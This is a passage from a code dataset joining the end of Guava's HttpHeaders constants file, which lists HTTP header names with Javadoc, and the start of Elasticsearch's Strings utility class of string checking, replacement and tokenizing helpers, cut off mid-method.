public static final String ORIGIN_TRIAL = "Origin-Trial";
/** The HTTP {@code P3P} header field name. Limited browser support. */
public static final String P3P = "P3P";
/** The HTTP {@code Proxy-Authenticate} header field name. */
public static final String PROXY_AUTHENTICATE = "Proxy-Authenticate";
/** The HTTP {@code Refresh} header field name. Non-standard header supported by most browsers. */
public static final String REFRESH = "Refresh";
/**
* The HTTP <a href="https://www.w3.org/TR/reporting/">{@code Report-To}</a> header field name.
*
* @since 27.1
*/
public static final String REPORT_TO = "Report-To";
/** The HTTP {@code Retry-After} header field name. */
public static final String RETRY_AFTER = "Retry-After";
/** The HTTP {@code Server} header field name. */
public static final String SERVER = "Server";
/**
* The HTTP <a href="https://www.w3.org/TR/server-timing/">{@code Server-Timing}</a> header field
* name.
*
* @since 23.6
*/
public static final String SERVER_TIMING = "Server-Timing";
/**
* The HTTP <a href="https://www.w3.org/TR/service-workers/#update-algorithm">{@code
* Service-Worker-Allowed}</a> header field name.
*
* @since 20.0
*/
public static final String SERVICE_WORKER_ALLOWED = "Service-Worker-Allowed";
/** The HTTP {@code Set-Cookie} header field name. */
public static final String SET_COOKIE = "Set-Cookie";
/** The HTTP {@code Set-Cookie2} header field name. */
public static final String SET_COOKIE2 = "Set-Cookie2";
/**
* The HTTP <a href="http://goo.gl/Dxx19N">{@code SourceMap}</a> header field name.
*
* @since 27.1
*/
public static final String SOURCE_MAP = "SourceMap";
/**
* The HTTP <a href="https://github.com/WICG/nav-speculation/blob/main/opt-in.md">{@code
* Supports-Loading-Mode}</a> header field name. This can be used to specify, for example, <a
* href="https://developer.chrome.com/docs/privacy-sandbox/fenced-frame/#server-opt-in">fenced
* frames</a>.
*
* @since 32.0.0
*/
public static final String SUPPORTS_LOADING_MODE = "Supports-Loading-Mode";
/**
* The HTTP <a href="http://tools.ietf.org/html/rfc6797#section-6.1">{@code
* Strict-Transport-Security}</a> header field name.
*
* @since 15.0
*/
public static final String STRICT_TRANSPORT_SECURITY = "Strict-Transport-Security";
/**
* The HTTP <a href="http://www.w3.org/TR/resource-timing/#cross-origin-resources">{@code
* Timing-Allow-Origin}</a> header field name.
*
* @since 15.0
*/
public static final String TIMING_ALLOW_ORIGIN = "Timing-Allow-Origin";
/** The HTTP {@code Trailer} header field name. */
public static final String TRAILER = "Trailer";
/** The HTTP {@code Transfer-Encoding} header field name. */
public static final String TRANSFER_ENCODING = "Transfer-Encoding";
/** The HTTP {@code Vary} header field name. */
public static final String VARY = "Vary";
/** The HTTP {@code WWW-Authenticate} header field name. */
public static final String WWW_AUTHENTICATE = "WWW-Authenticate";
// Common, non-standard HTTP header fields
/** The HTTP {@code DNT} header field name. */
public static final String DNT = "DNT";
/** The HTTP {@code X-Content-Type-Options} header field name. */
public static final String X_CONTENT_TYPE_OPTIONS = "X-Content-Type-Options";
/**
* The HTTP <a
* href="https://iabtechlab.com/wp-content/uploads/2019/06/VAST_4.2_final_june26.pdf">{@code
* X-Device-IP}</a> header field name. Header used for VAST requests to provide the IP address of
* the device on whose behalf the request is being made.
*
* @since 31.0
*/
public static final String X_DEVICE_IP = "X-Device-IP";
/**
* The HTTP <a
* href="https://iabtechlab.com/wp-content/uploads/2019/06/VAST_4.2_final_june26.pdf">{@code
* X-Device-Referer}</a> header field name. Header used for VAST requests to provide the {@link
* #REFERER} header value that the on-behalf-of client would have used when making a request
* itself.
*
* @since 31.0
*/
public static final String X_DEVICE_REFERER = "X-Device-Referer";
/**
* The HTTP <a
* href="https://iabtechlab.com/wp-content/uploads/2019/06/VAST_4.2_final_june26.pdf">{@code
* X-Device-Accept-Language}</a> header field name. Header used for VAST requests to provide the
* {@link #ACCEPT_LANGUAGE} header value that the on-behalf-of client would have used when making
* a request itself.
*
* @since 31.0
*/
public static final String X_DEVICE_ACCEPT_LANGUAGE = "X-Device-Accept-Language";
/**
* The HTTP <a
* href="https://iabtechlab.com/wp-content/uploads/2019/06/VAST_4.2_final_june26.pdf">{@code
* X-Device-Requested-With}</a> header field name. Header used for VAST requests to provide the
* {@link #X_REQUESTED_WITH} header value that the on-behalf-of client would have used when making
* a request itself.
*
* @since 31.0
*/
public static final String X_DEVICE_REQUESTED_WITH = "X-Device-Requested-With";
/** The HTTP {@code X-Do-Not-Track} header field name. */
public static final String X_DO_NOT_TRACK = "X-Do-Not-Track";
/** The HTTP {@code X-Forwarded-For} header field name (superseded by {@code Forwarded}). */
public static final String X_FORWARDED_FOR = "X-Forwarded-For";
/** The HTTP {@code X-Forwarded-Proto} header field name. */
public static final String X_FORWARDED_PROTO = "X-Forwarded-Proto";
/**
* The HTTP <a href="http://goo.gl/lQirAH">{@code X-Forwarded-Host}</a> header field name.
*
* @since 20.0
*/
public static final String X_FORWARDED_HOST = "X-Forwarded-Host";
/**
* The HTTP <a href="http://goo.gl/YtV2at">{@code X-Forwarded-Port}</a> header field name.
*
* @since 20.0
*/
public static final String X_FORWARDED_PORT = "X-Forwarded-Port";
/** The HTTP {@code X-Frame-Options} header field name. */
public static final String X_FRAME_OPTIONS = "X-Frame-Options";
/** The HTTP {@code X-Powered-By} header field name. */
public static final String X_POWERED_BY = "X-Powered-By";
/**
* The HTTP <a href="http://tools.ietf.org/html/draft-evans-palmer-key-pinning">{@code
* Public-Key-Pins}</a> header field name.
*
* @since 15.0
*/
public static final String PUBLIC_KEY_PINS = "Public-Key-Pins";
/**
* The HTTP <a href="http://tools.ietf.org/html/draft-evans-palmer-key-pinning">{@code
* Public-Key-Pins-Report-Only}</a> header field name.
*
* @since 15.0
*/
public static final String PUBLIC_KEY_PINS_REPORT_ONLY = "Public-Key-Pins-Report-Only";
/**
* The HTTP {@code X-Request-ID} header field name.
*
* @since 30.1
*/
public static final String X_REQUEST_ID = "X-Request-ID";
/** The HTTP {@code X-Requested-With} header field name. */
public static final String X_REQUESTED_WITH = "X-Requested-With";
/** The HTTP {@code X-User-IP} header field name. */
public static final String X_USER_IP = "X-User-IP";
/**
* The HTTP <a href="https://goo.gl/VKpXxa">{@code X-Download-Options}</a> header field name.
*
* <p>When the new X-Download-Options header is present with the value {@code noopen}, the user is
* prevented from opening a file download directly; instead, they must first save the file
* locally.
*
* @since 24.1
*/
public static final String X_DOWNLOAD_OPTIONS = "X-Download-Options";
/** The HTTP {@code X-XSS-Protection} header field name. */
public static final String X_XSS_PROTECTION = "X-XSS-Protection";
/**
* The HTTP <a
* href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-DNS-Prefetch-Control">{@code
* X-DNS-Prefetch-Control}</a> header controls DNS prefetch behavior. Value can be "on" or "off".
* By default, DNS prefetching is "on" for HTTP pages and "off" for HTTPS pages.
*/
public static final String X_DNS_PREFETCH_CONTROL = "X-DNS-Prefetch-Control";
/**
* The HTTP <a href="http://html.spec.whatwg.org/multipage/semantics.html#hyperlink-auditing">
* {@code Ping-From}</a> header field name.
*
* @since 19.0
*/
public static final String PING_FROM = "Ping-From";
/**
* The HTTP <a href="http://html.spec.whatwg.org/multipage/semantics.html#hyperlink-auditing">
* {@code Ping-To}</a> header field name.
*
* @since 19.0
*/
public static final String PING_TO = "Ping-To";
/**
* The HTTP <a
* href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Link_prefetching_FAQ#As_a_server_admin.2C_can_I_distinguish_prefetch_requests_from_normal_requests.3F">{@code
* Purpose}</a> header field name.
*
* @since 28.0
*/
public static final String PURPOSE = "Purpose";
/**
* The HTTP <a
* href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Link_prefetching_FAQ#As_a_server_admin.2C_can_I_distinguish_prefetch_requests_from_normal_requests.3F">{@code
* X-Purpose}</a> header field name.
*
* @since 28.0
*/
public static final String X_PURPOSE = "X-Purpose";
/**
* The HTTP <a
* href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Link_prefetching_FAQ#As_a_server_admin.2C_can_I_distinguish_prefetch_requests_from_normal_requests.3F">{@code
* X-Moz}</a> header field name.
*
* @since 28.0
*/
public static final String X_MOZ = "X-Moz";
/**
* The HTTP <a
* href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Device-Memory">{@code
* Device-Memory}</a> header field name.
*
* @since 31.0
*/
public static final String DEVICE_MEMORY = "Device-Memory";
/**
* The HTTP <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Downlink">{@code
* Downlink}</a> header field name.
*
* @since 31.0
*/
public static final String DOWNLINK = "Downlink";
/**
* The HTTP <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/ECT">{@code
* ECT}</a> header field name.
*
* @since 31.0
*/
public static final String ECT = "ECT";
/**
* The HTTP <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/RTT">{@code
* RTT}</a> header field name.
*
* @since 31.0
*/
public static final String RTT = "RTT";
/**
* The HTTP <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Save-Data">{@code
* Save-Data}</a> header field name.
*
* @since 31.0
*/
public static final String SAVE_DATA = "Save-Data";
/**
* The HTTP <a
* href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Viewport-Width">{@code
* Viewport-Width}</a> header field name.
*
* @since 31.0
*/
public static final String VIEWPORT_WIDTH = "Viewport-Width";
/**
* The HTTP <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Width">{@code
* Width}</a> header field name.
*
* @since 31.0
*/
public static final String WIDTH = "Width";
/**
* The HTTP <a href="https://www.w3.org/TR/permissions-policy-1/">{@code Permissions-Policy}</a>
* header field name.
*
* @since 31.0
*/
public static final String PERMISSIONS_POLICY = "Permissions-Policy";
/**
* The HTTP <a
* href="https://w3c.github.io/webappsec-permissions-policy/#permissions-policy-report-only-http-header-field">{@code
* Permissions-Policy-Report-Only}</a> header field name.
*
* @since 33.2.0
*/
public static final String PERMISSIONS_POLICY_REPORT_ONLY = "Permissions-Policy-Report-Only";
/**
* The HTTP <a
* href="https://wicg.github.io/user-preference-media-features-headers/#sec-ch-prefers-color-scheme">{@code
* Sec-CH-Prefers-Color-Scheme}</a> header field name.
*
* <p>This header is experimental.
*
* @since 31.0
*/
public static final String SEC_CH_PREFERS_COLOR_SCHEME = "Sec-CH-Prefers-Color-Scheme";
/**
* The HTTP <a
* href="https://www.rfc-editor.org/rfc/rfc8942#name-the-accept-ch-response-head">{@code
* Accept-CH}</a> header field name.
*
* @since 31.0
*/
public static final String ACCEPT_CH = "Accept-CH";
/**
* The HTTP <a
* href="https://datatracker.ietf.org/doc/html/draft-davidben-http-client-hint-reliability-03.txt#section-3">{@code
* Critical-CH}</a> header field name.
*
* @since 31.0
*/
public static final String CRITICAL_CH = "Critical-CH";
/**
* The HTTP <a href="https://wicg.github.io/ua-client-hints/#sec-ch-ua">{@code Sec-CH-UA}</a>
* header field name.
*
* @since 30.0
*/
public static final String SEC_CH_UA = "Sec-CH-UA";
/**
* The HTTP <a href="https://wicg.github.io/ua-client-hints/#sec-ch-ua-arch">{@code
* Sec-CH-UA-Arch}</a> header field name.
*
* @since 30.0
*/
public static final String SEC_CH_UA_ARCH = "Sec-CH-UA-Arch";
/**
* The HTTP <a href="https://wicg.github.io/ua-client-hints/#sec-ch-ua-model">{@code
* Sec-CH-UA-Model}</a> header field name.
*
* @since 30.0
*/
public static final String SEC_CH_UA_MODEL = "Sec-CH-UA-Model";
/**
* The HTTP <a href="https://wicg.github.io/ua-client-hints/#sec-ch-ua-platform">{@code
* Sec-CH-UA-Platform}</a> header field name.
*
* @since 30.0
*/
public static final String SEC_CH_UA_PLATFORM = "Sec-CH-UA-Platform";
/**
* The HTTP <a href="https://wicg.github.io/ua-client-hints/#sec-ch-ua-platform-version">{@code
* Sec-CH-UA-Platform-Version}</a> header field name.
*
* @since 30.0
*/
public static final String SEC_CH_UA_PLATFORM_VERSION = "Sec-CH-UA-Platform-Version";
/**
* The HTTP <a href="https://wicg.github.io/ua-client-hints/#sec-ch-ua-full-version">{@code
* Sec-CH-UA-Full-Version}</a> header field name.
*
* @deprecated Prefer {@link #SEC_CH_UA_FULL_VERSION_LIST}.
* @since 30.0
*/
@Deprecated public static final String SEC_CH_UA_FULL_VERSION = "Sec-CH-UA-Full-Version";
/**
* The HTTP <a href="https://wicg.github.io/ua-client-hints/#sec-ch-ua-full-version-list">{@code
* Sec-CH-UA-Full-Version-List}</a> header field name.
*
* @since 31.1
*/
public static final String SEC_CH_UA_FULL_VERSION_LIST = "Sec-CH-UA-Full-Version-List";
/**
* The HTTP <a href="https://wicg.github.io/ua-client-hints/#sec-ch-ua-mobile">{@code
* Sec-CH-UA-Mobile}</a> header field name.
*
* @since 30.0
*/
public static final String SEC_CH_UA_MOBILE = "Sec-CH-UA-Mobile";
/**
* The HTTP <a href="https://wicg.github.io/ua-client-hints/#sec-ch-ua-wow64">{@code
* Sec-CH-UA-WoW64}</a> header field name.
*
* @since 32.0.0
*/
public static final String SEC_CH_UA_WOW64 = "Sec-CH-UA-WoW64";
/**
* The HTTP <a href="https://wicg.github.io/ua-client-hints/#sec-ch-ua-bitness">{@code
* Sec-CH-UA-Bitness}</a> header field name.
*
* @since 31.0
*/
public static final String SEC_CH_UA_BITNESS = "Sec-CH-UA-Bitness";
/**
* The HTTP <a href="https://wicg.github.io/ua-client-hints/#sec-ch-ua-form-factor">{@code
* Sec-CH-UA-Form-Factor}</a> header field name.
*
* @since 32.0.0
*/
public static final String SEC_CH_UA_FORM_FACTOR = "Sec-CH-UA-Form-Factor";
/**
* The HTTP <a
* href="https://wicg.github.io/responsive-image-client-hints/#sec-ch-viewport-width">{@code
* Sec-CH-Viewport-Width}</a> header field name.
*
* @since 32.0.0
*/
public static final String SEC_CH_VIEWPORT_WIDTH = "Sec-CH-Viewport-Width";
/**
* The HTTP <a
* href="https://wicg.github.io/responsive-image-client-hints/#sec-ch-viewport-height">{@code
* Sec-CH-Viewport-Height}</a> header field name.
*
* @since 32.0.0
*/
public static final String SEC_CH_VIEWPORT_HEIGHT = "Sec-CH-Viewport-Height";
/**
* The HTTP <a href="https://wicg.github.io/responsive-image-client-hints/#sec-ch-dpr">{@code
* Sec-CH-DPR}</a> header field name.
*
* @since 32.0.0
*/
public static final String SEC_CH_DPR = "Sec-CH-DPR";
/**
* The HTTP <a href="https://w3c.github.io/webappsec-fetch-metadata/">{@code Sec-Fetch-Dest}</a>
* header field name.
*
* @since 27.1
*/
public static final String SEC_FETCH_DEST = "Sec-Fetch-Dest";
/**
* The HTTP <a href="https://w3c.github.io/webappsec-fetch-metadata/">{@code Sec-Fetch-Mode}</a>
* header field name.
*
* @since 27.1
*/
public static final String SEC_FETCH_MODE = "Sec-Fetch-Mode";
/**
* The HTTP <a href="https://w3c.github.io/webappsec-fetch-metadata/">{@code Sec-Fetch-Site}</a>
* header field name.
*
* @since 27.1
*/
public static final String SEC_FETCH_SITE = "Sec-Fetch-Site";
/**
* The HTTP <a href="https://w3c.github.io/webappsec-fetch-metadata/">{@code Sec-Fetch-User}</a>
* header field name.
*
* @since 27.1
*/
public static final String SEC_FETCH_USER = "Sec-Fetch-User";
/**
* The HTTP <a href="https://w3c.github.io/webappsec-fetch-metadata/">{@code Sec-Metadata}</a>
* header field name.
*
* @since 26.0
*/
public static final String SEC_METADATA = "Sec-Metadata";
/**
* The HTTP <a href="https://tools.ietf.org/html/draft-ietf-tokbind-https">{@code
* Sec-Token-Binding}</a> header field name.
*
* @since 25.1
*/
public static final String SEC_TOKEN_BINDING = "Sec-Token-Binding";
/**
* The HTTP <a href="https://tools.ietf.org/html/draft-ietf-tokbind-ttrp">{@code
* Sec-Provided-Token-Binding-ID}</a> header field name.
*
* @since 25.1
*/
public static final String SEC_PROVIDED_TOKEN_BINDING_ID = "Sec-Provided-Token-Binding-ID";
/**
* The HTTP <a href="https://tools.ietf.org/html/draft-ietf-tokbind-ttrp">{@code
* Sec-Referred-Token-Binding-ID}</a> header field name.
*
* @since 25.1
*/
public static final String SEC_REFERRED_TOKEN_BINDING_ID = "Sec-Referred-Token-Binding-ID";
/**
* The HTTP <a href="https://tools.ietf.org/html/rfc6455">{@code Sec-WebSocket-Accept}</a> header
* field name.
*
* @since 28.0
*/
public static final String SEC_WEBSOCKET_ACCEPT = "Sec-WebSocket-Accept";
/**
* The HTTP <a href="https://tools.ietf.org/html/rfc6455">{@code Sec-WebSocket-Extensions}</a>
* header field name.
*
* @since 28.0
*/
public static final String SEC_WEBSOCKET_EXTENSIONS = "Sec-WebSocket-Extensions";
/**
* The HTTP <a href="https://tools.ietf.org/html/rfc6455">{@code Sec-WebSocket-Key}</a> header
* field name.
*
* @since 28.0
*/
public static final String SEC_WEBSOCKET_KEY = "Sec-WebSocket-Key";
/**
* The HTTP <a href="https://tools.ietf.org/html/rfc6455">{@code Sec-WebSocket-Protocol}</a>
* header field name.
*
* @since 28.0
*/
public static final String SEC_WEBSOCKET_PROTOCOL = "Sec-WebSocket-Protocol";
/**
* The HTTP <a href="https://tools.ietf.org/html/rfc6455">{@code Sec-WebSocket-Version}</a> header
* field name.
*
* @since 28.0
*/
public static final String SEC_WEBSOCKET_VERSION = "Sec-WebSocket-Version";
/**
* The HTTP <a href="https://patcg-individual-drafts.github.io/topics/">{@code
* Sec-Browsing-Topics}</a> header field name.
*
* @since 32.0.0
*/
public static final String SEC_BROWSING_TOPICS = "Sec-Browsing-Topics";
/**
* The HTTP <a href="https://patcg-individual-drafts.github.io/topics/">{@code
* Observe-Browsing-Topics}</a> header field name.
*
* @since 32.0.0
*/
public static final String OBSERVE_BROWSING_TOPICS = "Observe-Browsing-Topics";
/**
* The HTTP <a
* href="https://wicg.github.io/turtledove/#handling-direct-from-seller-signals">{@code
* Sec-Ad-Auction-Fetch}</a> header field name.
*
* @since 33.0.0
*/
public static final String SEC_AD_AUCTION_FETCH = "Sec-Ad-Auction-Fetch";
/**
* The HTTP <a
* href="https://privacycg.github.io/gpc-spec/#the-sec-gpc-header-field-for-http-requests">{@code
* Sec-GPC}</a> header field name.
*
* @since 33.2.0
*/
public static final String SEC_GPC = "Sec-GPC";
/**
* The HTTP <a
* href="https://wicg.github.io/turtledove/#handling-direct-from-seller-signals">{@code
* Ad-Auction-Signals}</a> header field name.
*
* @since 33.0.0
*/
public static final String AD_AUCTION_SIGNALS = "Ad-Auction-Signals";
/**
* The HTTP <a href="https://wicg.github.io/turtledove/#http-headerdef-ad-auction-allowed">{@code
* Ad-Auction-Allowed}</a> header field name.
*
* @since 33.2.0
*/
public static final String AD_AUCTION_ALLOWED = "Ad-Auction-Allowed";
/**
* The HTTP <a href="https://tools.ietf.org/html/rfc8586">{@code CDN-Loop}</a> header field name.
*
* @since 28.0
*/
public static final String CDN_LOOP = "CDN-Loop";
}
| google/guava | guava/src/com/google/common/net/HttpHeaders.java |
1,141 | /*
* Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
* or more contributor license agreements. Licensed under the Elastic License
* 2.0 and the Server Side Public License, v 1; you may not use this file except
* in compliance with, at your election, the Elastic License 2.0 or the Server
* Side Public License, v 1.
*/
package org.elasticsearch.common;
import org.apache.lucene.util.BytesRefBuilder;
import org.elasticsearch.ElasticsearchException;
import org.elasticsearch.ExceptionsHelper;
import org.elasticsearch.common.bytes.BytesReference;
import org.elasticsearch.common.util.CollectionUtils;
import org.elasticsearch.common.xcontent.ChunkedToXContent;
import org.elasticsearch.core.Nullable;
import org.elasticsearch.xcontent.ToXContent;
import org.elasticsearch.xcontent.XContentBuilder;
import org.elasticsearch.xcontent.json.JsonXContent;
import java.io.IOException;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.Collection;
import java.util.Collections;
import java.util.HashSet;
import java.util.Iterator;
import java.util.List;
import java.util.Objects;
import java.util.Set;
import java.util.StringTokenizer;
import java.util.TreeSet;
import java.util.function.Supplier;
import java.util.regex.Pattern;
import java.util.stream.Collectors;
public class Strings {
public static final String[] EMPTY_ARRAY = new String[0];
// ---------------------------------------------------------------------
// General convenience methods for working with Strings
// ---------------------------------------------------------------------
/**
* Check that the given CharSequence is neither <code>null</code> nor of length 0.
* Note: Will return <code>true</code> for a CharSequence that purely consists of whitespace.
* <pre>
* StringUtils.hasLength(null) = false
* StringUtils.hasLength("") = false
* StringUtils.hasLength(" ") = true
* StringUtils.hasLength("Hello") = true
* </pre>
*
* @param str the CharSequence to check (may be <code>null</code>)
* @return <code>true</code> if the CharSequence is not null and has length
* @see #hasText(String)
*/
public static boolean hasLength(CharSequence str) {
return (str != null && str.isEmpty() == false);
}
/**
* Check that the given BytesReference is neither <code>null</code> nor of length 0
* Note: Will return <code>true</code> for a BytesReference that purely consists of whitespace.
*
* @param bytesReference the BytesReference to check (may be <code>null</code>)
* @return <code>true</code> if the BytesReference is not null and has length
* @see #hasLength(CharSequence)
*/
public static boolean hasLength(BytesReference bytesReference) {
return (bytesReference != null && bytesReference.length() > 0);
}
/**
* Check that the given String is neither <code>null</code> nor of length 0.
* Note: Will return <code>true</code> for a String that purely consists of whitespace.
*
* @param str the String to check (may be <code>null</code>)
* @return <code>true</code> if the String is not null and has length
* @see #hasLength(CharSequence)
*/
public static boolean hasLength(String str) {
return hasLength((CharSequence) str);
}
/**
* Check that the given CharSequence is either <code>null</code> or of length 0.
* Note: Will return <code>false</code> for a CharSequence that purely consists of whitespace.
* <pre>
* StringUtils.isEmpty(null) = true
* StringUtils.isEmpty("") = true
* StringUtils.isEmpty(" ") = false
* StringUtils.isEmpty("Hello") = false
* </pre>
*
* @param str the CharSequence to check (may be <code>null</code>)
* @return <code>true</code> if the CharSequence is either null or has a zero length
*/
public static boolean isEmpty(CharSequence str) {
return hasLength(str) == false;
}
/**
* Check whether the given CharSequence has actual text.
* More specifically, returns <code>true</code> if the string is not <code>null</code>,
* its length is greater than 0, and it contains at least one non-whitespace character.
* <pre>
* StringUtils.hasText(null) = false
* StringUtils.hasText("") = false
* StringUtils.hasText(" ") = false
* StringUtils.hasText("12345") = true
* StringUtils.hasText(" 12345 ") = true
* </pre>
*
* @param str the CharSequence to check (may be <code>null</code>)
* @return <code>true</code> if the CharSequence is not <code>null</code>,
* its length is greater than 0, and it does not contain whitespace only
* @see java.lang.Character#isWhitespace
*/
public static boolean hasText(CharSequence str) {
if (hasLength(str) == false) {
return false;
}
int strLen = str.length();
for (int i = 0; i < strLen; i++) {
if (Character.isWhitespace(str.charAt(i)) == false) {
return true;
}
}
return false;
}
/**
* Check whether the given String has actual text.
* More specifically, returns <code>true</code> if the string is not <code>null</code>,
* its length is greater than 0, and it contains at least one non-whitespace character.
*
* @param str the String to check (may be <code>null</code>)
* @return <code>true</code> if the String is not <code>null</code>, its length is
* greater than 0, and it does not contain whitespace only
* @see #hasText(CharSequence)
*/
public static boolean hasText(String str) {
return isNullOrBlank(str) == false;
}
/**
* Trim all occurrences of the supplied leading character from the given String.
*
* @param str the String to check
* @param leadingCharacter the leading character to be trimmed
* @return the trimmed String
*/
public static String trimLeadingCharacter(String str, char leadingCharacter) {
if (hasLength(str) == false) {
return str;
}
int i = 0;
while (i < str.length() && str.charAt(i) == leadingCharacter) {
i++;
}
return str.substring(i);
}
/**
* Test whether the given string matches the given substring
* at the given index.
*
* @param str the original string (or StringBuilder)
* @param index the index in the original string to start matching against
* @param substring the substring to match at the given index
*/
public static boolean substringMatch(CharSequence str, int index, CharSequence substring) {
for (int j = 0; j < substring.length(); j++) {
int i = index + j;
if (i >= str.length() || str.charAt(i) != substring.charAt(j)) {
return false;
}
}
return true;
}
/**
* Replace all occurrences of a substring within a string with
* another string.
*
* @param inString String to examine
* @param oldPattern String to replace
* @param newPattern String to insert
* @return a String with the replacements
*/
public static String replace(String inString, String oldPattern, String newPattern) {
if (hasLength(inString) == false || hasLength(oldPattern) == false || newPattern == null) {
return inString;
}
StringBuilder sb = new StringBuilder();
int pos = 0; // our position in the old string
int index = inString.indexOf(oldPattern);
// the index of an occurrence we've found, or -1
int patLen = oldPattern.length();
while (index >= 0) {
sb.append(inString, pos, index);
sb.append(newPattern);
pos = index + patLen;
index = inString.indexOf(oldPattern, pos);
}
sb.append(inString.substring(pos));
// remember to append any characters to the right of a match
return sb.toString();
}
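/*
 * Illustrative usage (editor-added sketch, not part of the original class):
 *
 *   Strings.replace("a-b-c", "-", "::");   // "a::b::c"
 *   Strings.replace("a-b-c", "x", "::");   // "a-b-c" (no occurrence, input returned unchanged)
 */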
/**
* Delete any character in a given String.
*
* @param inString the original String
* @param charsToDelete a set of characters to delete.
* E.g. "az\n" will delete 'a's, 'z's and new lines.
* @return the resulting String
*/
public static String deleteAny(String inString, String charsToDelete) {
return inString != null ? deleteAny((CharSequence) inString, charsToDelete).toString() : null;
}
/**
* Delete any character in a given CharSequence.
*
* @param inString the original CharSequence
* @param charsToDelete a set of characters to delete.
* E.g. "az\n" will delete 'a's, 'z's and new lines.
* @return the resulting CharSequence
*/
public static CharSequence deleteAny(CharSequence inString, String charsToDelete) {
if (hasLength(inString) == false || hasLength(charsToDelete) == false) {
return inString;
}
StringBuilder sb = new StringBuilder(inString.length());
for (int i = 0; i < inString.length(); i++) {
char c = inString.charAt(i);
if (charsToDelete.indexOf(c) == -1) {
sb.append(c);
}
}
return sb;
}
// ---------------------------------------------------------------------
// Convenience methods for working with formatted Strings
// ---------------------------------------------------------------------
/**
* Capitalize a <code>String</code>, changing the first letter to
* upper case as per {@link Character#toUpperCase(char)}.
* No other letters are changed.
*
* @param str the String to capitalize, may be <code>null</code>
* @return the capitalized String, <code>null</code> if null
*/
public static String capitalize(String str) {
return changeFirstCharacterCase(str, true);
}
private static String changeFirstCharacterCase(String str, boolean capitalize) {
if (str == null || str.length() == 0) {
return str;
}
char newChar = capitalize ? Character.toUpperCase(str.charAt(0)) : Character.toLowerCase(str.charAt(0));
if (newChar == str.charAt(0)) {
return str; // nothing changed
}
return newChar + str.substring(1);
}
// Visible for testing
static final Set<Character> INVALID_CHARS = Set.of('\\', '/', '*', '?', '"', '<', '>', '|', ' ', ',');
public static final String INVALID_FILENAME_CHARS = INVALID_CHARS.stream()
.map(c -> "'" + c + "'")
.collect(Collectors.joining(",", "[", "]"));
public static final Pattern INVALID_FILENAME_CHARS_REGEX = Pattern.compile(
"[" + INVALID_CHARS.stream().map(Objects::toString).map(Pattern::quote).collect(Collectors.joining()) + "]+"
);
public static boolean validFileName(String fileName) {
for (int i = 0; i < fileName.length(); i++) {
if (isInvalidFileNameCharacter(fileName.charAt(i))) {
return false;
}
}
return true;
}
public static boolean validFileNameExcludingAstrix(String fileName) {
for (int i = 0; i < fileName.length(); i++) {
char c = fileName.charAt(i);
if (c != '*' && isInvalidFileNameCharacter(c)) {
return false;
}
}
return true;
}
private static boolean isInvalidFileNameCharacter(char c) {
return switch (c) {
case '\\', '/', '*', '?', '"', '<', '>', '|', ' ', ',' -> true;
default -> false;
};
}
/**
* Copy the given Collection into a String array.
* The Collection must contain String elements only.
*
* @param collection the Collection to copy
* @return the String array (<code>null</code> if the passed-in
* Collection was <code>null</code>)
*/
public static String[] toStringArray(Collection<String> collection) {
if (collection == null) {
return null;
}
return collection.toArray(String[]::new);
}
/**
* Concatenate two string arrays into a third
*/
public static String[] concatStringArrays(String[] first, String[] second) {
if (first == null && second == null) {
return Strings.EMPTY_ARRAY;
}
if (first == null || first.length == 0) {
return second;
}
if (second == null || second.length == 0) {
return first;
}
String[] concat = new String[first.length + second.length];
System.arraycopy(first, 0, concat, 0, first.length);
System.arraycopy(second, 0, concat, first.length, second.length);
return concat;
}
/**
* Tokenize the specified string by commas to a set, trimming whitespace and ignoring empty tokens.
*
* @param s the string to tokenize
* @return the set of tokens
*/
public static Set<String> tokenizeByCommaToSet(final String s) {
if (s == null) return Collections.emptySet();
return tokenizeToCollection(s, ",", HashSet::new);
}
/**
* Split the specified string by commas to an array.
*
* @param s the string to split
* @return the array of split values
* @see String#split(String)
*/
public static String[] splitStringByCommaToArray(final String s) {
if (s == null || s.isEmpty()) return Strings.EMPTY_ARRAY;
else return s.split(",");
}
/**
* Split a String at the first occurrence of the delimiter.
* Does not include the delimiter in the result.
*
* @param toSplit the string to split
* @param delimiter to split the string up with
* @return a two element array with index 0 being before the delimiter, and
* index 1 being after the delimiter (neither element includes the delimiter);
* or <code>null</code> if the delimiter wasn't found in the given input String
*/
public static String[] split(String toSplit, String delimiter) {
if (hasLength(toSplit) == false || hasLength(delimiter) == false) {
return null;
}
int offset = toSplit.indexOf(delimiter);
if (offset < 0) {
return null;
}
String beforeDelimiter = toSplit.substring(0, offset);
String afterDelimiter = toSplit.substring(offset + delimiter.length());
return new String[] { beforeDelimiter, afterDelimiter };
}
/**
* Tokenize the given String into a String array via a StringTokenizer.
* Trims tokens and omits empty tokens.
* <p>The given delimiters string is supposed to consist of any number of
* delimiter characters. Each of those characters can be used to separate
* tokens. A delimiter is always a single character; for multi-character
* delimiters, consider using <code>delimitedListToStringArray</code>
*
* @param s the String to tokenize
* @param delimiters the delimiter characters, assembled as String
* (each of those characters is individually considered as delimiter).
* @return an array of the tokens
* @see java.util.StringTokenizer
* @see java.lang.String#trim()
* @see #delimitedListToStringArray
*/
public static String[] tokenizeToStringArray(final String s, final String delimiters) {
if (s == null) {
return EMPTY_ARRAY;
}
return toStringArray(tokenizeToCollection(s, delimiters, ArrayList::new));
}
/**
* Tokenizes the specified string to a collection using the specified delimiters as the token delimiters. This method trims whitespace
* from tokens and ignores empty tokens.
*
* @param s the string to tokenize.
* @param delimiters the token delimiters
* @param supplier a collection supplier
* @param <T> the type of the collection
* @return the tokens
* @see java.util.StringTokenizer
*/
private static <T extends Collection<String>> T tokenizeToCollection(
final String s,
final String delimiters,
final Supplier<T> supplier
) {
if (s == null) {
return null;
}
final StringTokenizer tokenizer = new StringTokenizer(s, delimiters);
final T tokens = supplier.get();
while (tokenizer.hasMoreTokens()) {
